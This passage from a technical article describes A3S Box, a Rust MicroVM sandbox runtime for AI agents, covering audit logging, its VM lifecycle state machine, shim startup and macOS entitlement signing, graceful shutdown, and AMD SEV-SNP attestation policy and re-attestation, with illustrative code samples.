&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  8.6 Auditing and Compliance
&lt;/h3&gt;

&lt;p&gt;In AI Agent platforms, audit capability is not only a security requirement but also a compliance requirement. Regulators are increasingly focused on the traceability of AI systems — "What did the AI do? When? What was the result?"&lt;/p&gt;

&lt;p&gt;A3S Box's 26 audit operations record every action an Agent takes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Which sandboxes the Agent created (&lt;code&gt;Create&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Which commands the Agent executed (&lt;code&gt;Command&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Which images the Agent pulled (&lt;code&gt;Pull&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Whether the Agent's operations succeeded (&lt;code&gt;Success&lt;/code&gt; / &lt;code&gt;Failure&lt;/code&gt; / &lt;code&gt;Denied&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These audit logs are stored in structured JSON-lines format and can be imported into any log analysis system for post-hoc review.&lt;/p&gt;
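Because the logs are plain JSON lines, post-hoc filtering needs no special tooling. The records and field names below are hypothetical (the actual A3S Box schema may differ); the point is how little code a JSON-lines audit trail requires:

```python
import json

# Hypothetical audit records in JSON-lines form. Field names
# ("action", "outcome", ...) are assumptions for illustration.
audit_log = """\
{"ts": "2026-02-23T19:00:01Z", "action": "Create", "target": "sandbox-1", "outcome": "Success"}
{"ts": "2026-02-23T19:00:02Z", "action": "Command", "target": "sandbox-1", "outcome": "Success"}
{"ts": "2026-02-23T19:00:03Z", "action": "Command", "target": "sandbox-1", "outcome": "Denied"}
"""

def filter_audit(lines: str, **criteria) -> list[dict]:
    """Parse JSON-lines audit output, keeping records matching all criteria."""
    records = [json.loads(line) for line in lines.splitlines() if line.strip()]
    return [r for r in records
            if all(r.get(k) == v for k, v in criteria.items())]

# e.g. every Command the policy layer rejected:
denied = filter_audit(audit_log, action="Command", outcome="Denied")
```

The same one-record-per-line structure is what lets these logs stream directly into systems like Elasticsearch or Loki without a conversion step.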

&lt;h3&gt;
  
  
  8.7 Lightweight Deployment: ~40MB Complete Runtime
&lt;/h3&gt;

&lt;p&gt;The compiled binary size of A3S Box is only about 40MB — this includes the complete CLI, runtime, OCI image processing, TEE support, network management, warm pool, audit system, and all other functionality.&lt;/p&gt;

&lt;p&gt;The significance of this number:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Compared to Docker Engine&lt;/strong&gt;: Docker's full installation exceeds 200MB and requires multiple components like containerd and runc&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compared to QEMU&lt;/strong&gt;: QEMU's installation package typically exceeds 100MB and depends on many dynamic libraries&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Edge deployment friendly&lt;/strong&gt;: A 40MB single binary can be easily deployed to IoT devices, edge nodes, and other storage-constrained environments&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Minimal container image&lt;/strong&gt;: A3S Box itself can be packaged as a minimal container image, making it easy to deploy as a DaemonSet in Kubernetes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This compact footprint comes from Rust's zero-cost abstractions and compile-time optimization: no runtime virtual machine, no garbage collector, no heavyweight standard-library runtime. The statically linked Guest Init binary is only a few MB, keeping the attack surface inside the MicroVM minimal.&lt;/p&gt;

&lt;p&gt;For AI Agent platforms, lightweight deployment means A3S Box can be quickly deployed on each compute node without consuming precious disk space and network bandwidth. Combined with the warm pool mechanism, the entire system can scale from zero to hundreds of isolated sandboxes within minutes.&lt;/p&gt;




&lt;h2&gt;
  
  
  9. Deep Dive: VM Lifecycle State Machine
&lt;/h2&gt;

&lt;h3&gt;
  
  
  9.1 BoxState State Machine
&lt;/h3&gt;

&lt;p&gt;A3S Box uses a strictly defined state machine to manage the lifecycle of each MicroVM. The state machine implements concurrency-safe state synchronization through &lt;code&gt;RwLock&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Created --&amp;gt; Ready --&amp;gt; Busy --&amp;gt; Ready
   |          |         |        |
   |          |         |        +--&amp;gt; Compacting --&amp;gt; Ready
   |          |         |
   |          +---------+-----------&amp;gt; Stopped
   |
   +-----------------------------------&amp;gt; Stopped
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;State meanings:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Created&lt;/strong&gt;: VM configuration has been generated but not yet started. At this point, &lt;code&gt;InstanceSpec&lt;/code&gt; has been fully constructed, containing vCPU count, memory size, rootfs path, entrypoint, network configuration, TEE configuration, and all other parameters.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ready&lt;/strong&gt;: VM has started and is ready to accept commands. Guest Init has completed initialization, and vsock servers are listening.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Busy&lt;/strong&gt;: VM is executing a command (exec or PTY session). In this state, new command requests are queued.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compacting&lt;/strong&gt;: VM is performing internal maintenance operations (such as log rotation, cache cleanup). This is a brief transitional state.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stopped&lt;/strong&gt;: VM has stopped. Can transition to this state from any state (normal shutdown or abnormal termination).&lt;/li&gt;
&lt;/ul&gt;
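The diagram and state list above can be condensed into an executable transition table. This is a sketch for illustration, not the real Rust enum (which additionally wraps the state in an `RwLock` for concurrent access); the transitions encode exactly what the diagram and prose describe, including "Stopped is reachable from any state":

```python
from enum import Enum, auto

class BoxState(Enum):
    CREATED = auto()
    READY = auto()
    BUSY = auto()
    COMPACTING = auto()
    STOPPED = auto()

# Legal transitions per the state diagram above. STOPPED is a valid
# target from every live state (normal shutdown or abnormal termination).
TRANSITIONS = {
    BoxState.CREATED:    {BoxState.READY, BoxState.STOPPED},
    BoxState.READY:      {BoxState.BUSY, BoxState.STOPPED},
    BoxState.BUSY:       {BoxState.READY, BoxState.COMPACTING, BoxState.STOPPED},
    BoxState.COMPACTING: {BoxState.READY, BoxState.STOPPED},
    BoxState.STOPPED:    set(),  # terminal state
}

def transition(current: BoxState, target: BoxState) -> BoxState:
    """Move to `target`, rejecting any edge the diagram does not allow."""
    if target not in TRANSITIONS[current]:
        raise ValueError(f"illegal transition {current.name} -> {target.name}")
    return target
```

Encoding the table this way means an impossible move (say, reviving a `Stopped` VM) fails loudly at the state-machine layer instead of corrupting runtime bookkeeping.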

&lt;h3&gt;
  
  
  9.2 VmController Startup Flow in Detail
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;VmController&lt;/code&gt; is the default implementation of the &lt;code&gt;VmmProvider&lt;/code&gt; trait, responsible for transforming an &lt;code&gt;InstanceSpec&lt;/code&gt; into a running MicroVM:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Simplified startup flow&lt;/span&gt;
&lt;span class="k"&gt;impl&lt;/span&gt; &lt;span class="n"&gt;VmmProvider&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;VmController&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;start&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;spec&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;InstanceSpec&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Box&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="k"&gt;dyn&lt;/span&gt; &lt;span class="n"&gt;VmHandler&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;// 1. Locate shim binary&lt;/span&gt;
        &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;shim_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;Self&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;find_shim&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="c1"&gt;// 2. macOS: ensure hypervisor entitlement&lt;/span&gt;
        &lt;span class="nd"&gt;#[cfg(target_os&lt;/span&gt; &lt;span class="nd"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"macos"&lt;/span&gt;&lt;span class="nd"&gt;)]&lt;/span&gt;
        &lt;span class="nf"&gt;ensure_entitlement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="c1"&gt;// 3. Serialize configuration&lt;/span&gt;
        &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;config_json&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;serde_json&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;to_string&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;spec&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="c1"&gt;// 4. Start shim subprocess&lt;/span&gt;
        &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;child&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;Command&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;.arg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"--config"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;.arg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;config_json&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;.stdin&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nn"&gt;Stdio&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;null&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
            &lt;span class="nf"&gt;.spawn&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="c1"&gt;// 5. Return ShimHandler&lt;/span&gt;
        &lt;span class="nf"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nn"&gt;Box&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nn"&gt;ShimHandler&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;from_child&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;child&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Shim location strategy&lt;/strong&gt; (&lt;code&gt;find_shim&lt;/code&gt;) searches in priority order:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Same directory as the current executable&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;~/.a3s/bin/&lt;/code&gt; user directory&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;target/debug&lt;/code&gt; or &lt;code&gt;target/release&lt;/code&gt; (development mode)&lt;/li&gt;
&lt;li&gt;System &lt;code&gt;PATH&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This multi-level search strategy ensures the shim binary can be correctly found in development, testing, and production environments.&lt;/p&gt;
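The search itself is a straightforward first-match scan over candidate paths. A minimal Python analogue, assuming a hypothetical binary name (`a3s-box-shim`) since the article does not state the real one:

```python
import os
from pathlib import Path

def find_shim(exe_dir: Path, home: Path, dev_dirs: list[Path],
              path_dirs: list[Path], name: str = "a3s-box-shim") -> Path:
    """Sketch of the priority search described above.

    The binary name and exact directory layout are assumptions for
    illustration; only the search order mirrors the article.
    """
    candidates = (
        [exe_dir / name,                    # 1. alongside the executable
         home / ".a3s" / "bin" / name]      # 2. user install directory
        + [d / name for d in dev_dirs]      # 3. target/debug, target/release
        + [d / name for d in path_dirs]     # 4. system PATH entries
    )
    for candidate in candidates:
        if candidate.is_file() and os.access(candidate, os.X_OK):
            return candidate
    raise FileNotFoundError(f"{name} not found in any search location")
```

Putting the executable's own directory first means a packaged release ships both binaries side by side and always finds its matching shim version, even when an older copy lingers in `PATH`.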

&lt;h3&gt;
  
  
  9.3 macOS Entitlement Signing
&lt;/h3&gt;

&lt;p&gt;On macOS, using Apple Hypervisor Framework (HVF) requires the binary to have the &lt;code&gt;com.apple.security.hypervisor&lt;/code&gt; entitlement. A3S Box handles this automatically:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;ensure_entitlement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;Path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Use file lock to prevent concurrent signing race conditions&lt;/span&gt;
    &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;lock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;FileLock&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="nf"&gt;.with_extension&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"lock"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;_guard&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lock&lt;/span&gt;&lt;span class="nf"&gt;.lock&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="c1"&gt;// Check if already signed&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;has_entitlement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"com.apple.security.hypervisor"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;(());&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Sign with codesign&lt;/span&gt;
    &lt;span class="nn"&gt;Command&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"codesign"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;.args&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="s"&gt;"--sign"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"-"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"--entitlements"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;entitlements_plist&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
               &lt;span class="s"&gt;"--force"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shim_path&lt;/span&gt;&lt;span class="nf"&gt;.to_str&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="nf"&gt;.unwrap&lt;/span&gt;&lt;span class="p"&gt;()])&lt;/span&gt;
        &lt;span class="nf"&gt;.status&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="nf"&gt;Ok&lt;/span&gt;&lt;span class="p"&gt;(())&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The file lock mechanism ensures that no signing race conditions occur when multiple A3S Box instances start simultaneously.&lt;/p&gt;

&lt;h3&gt;
  
  
  9.4 Graceful Shutdown and Forced Termination
&lt;/h3&gt;

&lt;p&gt;VM shutdown follows a two-phase protocol (graceful first, then forced), followed by exit-code collection:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Graceful shutdown&lt;/strong&gt;: Send the configured signal (default SIGTERM) to the shim process, then poll &lt;code&gt;try_wait()&lt;/code&gt; every 50ms, waiting up to &lt;code&gt;timeout_ms&lt;/code&gt; (default 10,000ms).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Forced termination&lt;/strong&gt;: If still not exited after timeout, escalate to SIGKILL.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exit code collection&lt;/strong&gt;: Collect the subprocess exit code via &lt;code&gt;wait()&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;For attached mode (without a Child handle), use &lt;code&gt;libc::waitpid&lt;/code&gt; with the &lt;code&gt;WNOHANG&lt;/code&gt; flag for non-blocking polling.&lt;/p&gt;
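&lt;p&gt;As a rough sketch (not the actual A3S Box code), the polling loop described above can be expressed with the standard library alone; the &lt;code&gt;kill(1)&lt;/code&gt; invocation stands in for direct signal delivery to the shim:&lt;/p&gt;

```rust
use std::process::{Child, Command};
use std::time::{Duration, Instant};

/// Hypothetical sketch of the two-phase shutdown described above.
/// Phase 1: deliver SIGTERM, then poll `try_wait()` every 50 ms.
/// Phase 2: escalate to SIGKILL once `timeout_ms` elapses.
pub fn shutdown(child: &mut Child, timeout_ms: u64) -> std::io::Result<i32> {
    // Graceful phase: SIGTERM via kill(1) for illustration; the real
    // runtime signals the shim process directly.
    Command::new("kill")
        .args(["-TERM", &child.id().to_string()])
        .status()?;

    let deadline = Instant::now() + Duration::from_millis(timeout_ms);
    while Instant::now() < deadline {
        if let Some(status) = child.try_wait()? {
            // -1 stands in for "terminated by signal" (no normal exit code).
            return Ok(status.code().unwrap_or(-1));
        }
        std::thread::sleep(Duration::from_millis(50));
    }

    // Forced phase: Child::kill() delivers SIGKILL on Unix.
    child.kill()?;
    let status = child.wait()?;
    Ok(status.code().unwrap_or(-1))
}
```

&lt;p&gt;&lt;code&gt;Child::kill()&lt;/code&gt; delivering SIGKILL on Unix matches the escalation step; a signal-terminated process reports no normal exit code.&lt;/p&gt;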




&lt;h2&gt;
  
  
  10. TEE Confidential Computing: The Trust Chain from Hardware to Application
&lt;/h2&gt;

&lt;h3&gt;
  
  
  10.1 Building the Trust Chain
&lt;/h3&gt;

&lt;p&gt;The core challenge of confidential computing is: &lt;strong&gt;How do we establish trust in the runtime environment inside a MicroVM without trusting the host machine?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A3S Box solves this through the following trust chain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;AMD Silicon (Physical Hardware)
    |
    +-- PSP (Platform Security Processor)
    |   +-- Manages AES encryption keys for each VM
    |
    +-- ARK (AMD Root Key) -- hardcoded in chip
    |   +-- ASK (AMD SEV Key) -- intermediate CA
    |       +-- VCEK (Versioned Chip Endorsement Key) -- chip unique
    |           +-- SNP Report Signature -- attestation report signature
    |
    +-- Measurement (SHA-384)
        +-- Hash of initial guest memory
            +-- Proves code loaded at VM startup has not been tampered with
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The root anchor of this trust chain is AMD's physical silicon — which cannot be forged by software. From silicon to attestation report, every step has cryptographic guarantees.&lt;/p&gt;

&lt;h3&gt;
  
  
  10.2 Attestation Policy Engine
&lt;/h3&gt;

&lt;p&gt;A3S Box implements a flexible attestation policy engine (&lt;code&gt;AttestationPolicy&lt;/code&gt;), allowing verifiers to customize verification rules according to their security requirements:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;AttestationPolicy&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cd"&gt;/// Expected initial memory hash (SHA-384)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;expected_measurement&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="mi"&gt;48&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Minimum TCB version requirement&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;min_tcb&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;TcbVersion&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Whether to require non-debug mode (should be true in production)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;require_no_debug&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Whether to require SMT disabled (prevents side-channel attacks)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;require_no_smt&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Allowed policy mask&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;allowed_policy_mask&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Maximum report validity period (seconds)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_report_age_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Policy verification returns &lt;code&gt;PolicyResult&lt;/code&gt;, containing pass/fail status and a specific list of violations (&lt;code&gt;Vec&amp;lt;PolicyViolation&amp;gt;&lt;/code&gt;). This design allows verifiers to precisely understand which policies were violated, rather than a simple "pass/fail."&lt;/p&gt;
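&lt;p&gt;To illustrate the collect-all-violations design, here is a minimal sketch with simplified, hypothetical field and variant names (the real policy engine performs more checks, including TCB and report-age validation):&lt;/p&gt;

```rust
/// Illustrative subset of the report fields the policy inspects.
pub struct SnpReport {
    pub measurement: [u8; 48],
    pub debug_enabled: bool,
    pub smt_enabled: bool,
}

#[derive(Debug, PartialEq)]
pub enum PolicyViolation {
    MeasurementMismatch,
    DebugEnabled,
    SmtEnabled,
}

pub struct PolicyResult {
    pub passed: bool,
    pub violations: Vec<PolicyViolation>,
}

/// Collect every violation instead of failing fast, so the verifier
/// can see exactly which rules were broken.
pub fn evaluate(
    report: &SnpReport,
    expected_measurement: Option<[u8; 48]>,
    require_no_debug: bool,
    require_no_smt: bool,
) -> PolicyResult {
    let mut violations = Vec::new();
    if let Some(expected) = expected_measurement {
        if report.measurement != expected {
            violations.push(PolicyViolation::MeasurementMismatch);
        }
    }
    if require_no_debug && report.debug_enabled {
        violations.push(PolicyViolation::DebugEnabled);
    }
    if require_no_smt && report.smt_enabled {
        violations.push(PolicyViolation::SmtEnabled);
    }
    PolicyResult { passed: violations.is_empty(), violations }
}
```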

&lt;h3&gt;
  
  
  10.3 Re-attestation Mechanism
&lt;/h3&gt;

&lt;p&gt;The security of a TEE environment is not a one-time guarantee — it requires continuous verification. A3S Box implements a periodic re-attestation mechanism:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ReattestConfig&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cd"&gt;/// Check interval (default 300 seconds)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;interval_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Maximum consecutive failures (default 3)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_failures&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="cd"&gt;/// Grace period after startup (default 60 seconds)&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;grace_period_secs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



